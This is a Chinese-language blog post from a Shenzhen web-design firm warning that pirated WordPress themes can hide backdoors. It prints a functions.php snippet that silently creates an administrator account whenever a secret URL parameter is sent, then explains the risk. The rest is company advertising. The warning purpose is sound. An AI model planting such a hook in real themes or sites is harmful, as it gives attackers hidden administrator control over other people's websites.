您的位置:首页 > wordpress

WordPress盗版主题暗藏后门
wordpress 2023-10-29编辑:深圳网站建设阅读( WordPress 暗藏 后门

前言

俗话说的好天下没有免费的午餐,你要相信没有人傻到做亏本生意,都是会有目的性的。最近我在网上看到一篇文章,写了WordPress的暗藏后门,觉得很有一说,所以就发一下让更多的WP友友们看到,不要轻易随便乱使用模板。

后门代码

add_action(‘wp_head’, ‘holeinthewall’);
function holeinthewall() {
If ($_GET[‘backdoor’] == ‘go’) {
require(‘wp-includes/registration.php’);
If (!username_exists(‘username’)) {
$user_id = wp_create_user(‘username’, ‘password’);
$user = new WP_User($user_id);
$user->set_role(‘administrator’);
}}}

由以上的代码我们可以看出,如果把这段代码插入到你的主题函数文件functions.php中的话,然后就会自动创建一个用户名为username,密码为password的有管理员权限的账户,然后恶意人员就可以登录到你的网站后台,后果你可以自己想象一下。

所以憧憬博主在这里建议大家不要随便乱使用WordPress的盗版主题,支持正版,抵制盗版,尊重开发者的劳动成果。

服务范围:WordPress搭建、WordPress主题开发、WordPress二次开发、WordPress插件开发
其它服务:网站建设、企业邮箱、数字证书ssl、400电话、
技术标签:企业网站、外贸网站、外贸商城、其它问题
联系方式:电话:13714666846 微信同号

企业网站定制

企业网站定制 根据企业需求,量身定制设计

企业网站定制:2800元起
添加微信 请说明来意
联系我们
站内搜索 MORE+

24小时服务热线 0755-29765948
  • 地址:深圳市罗湖区人民北路2033号206
  • 电话:0755-29765948 传真:82256610
  • 手机:13714666846 18948334877
  • 邮箱:gong@ew35.com 164761418@qq.com
  • 粤ICP备14049207号
创意化数字品牌整合网络营销
营销网站让你坐等商机坐佣客户,Rss

版权所有:深圳市网商在线科技有限公司

版权所有:深圳市网商在线科技有限公司
友情连接link: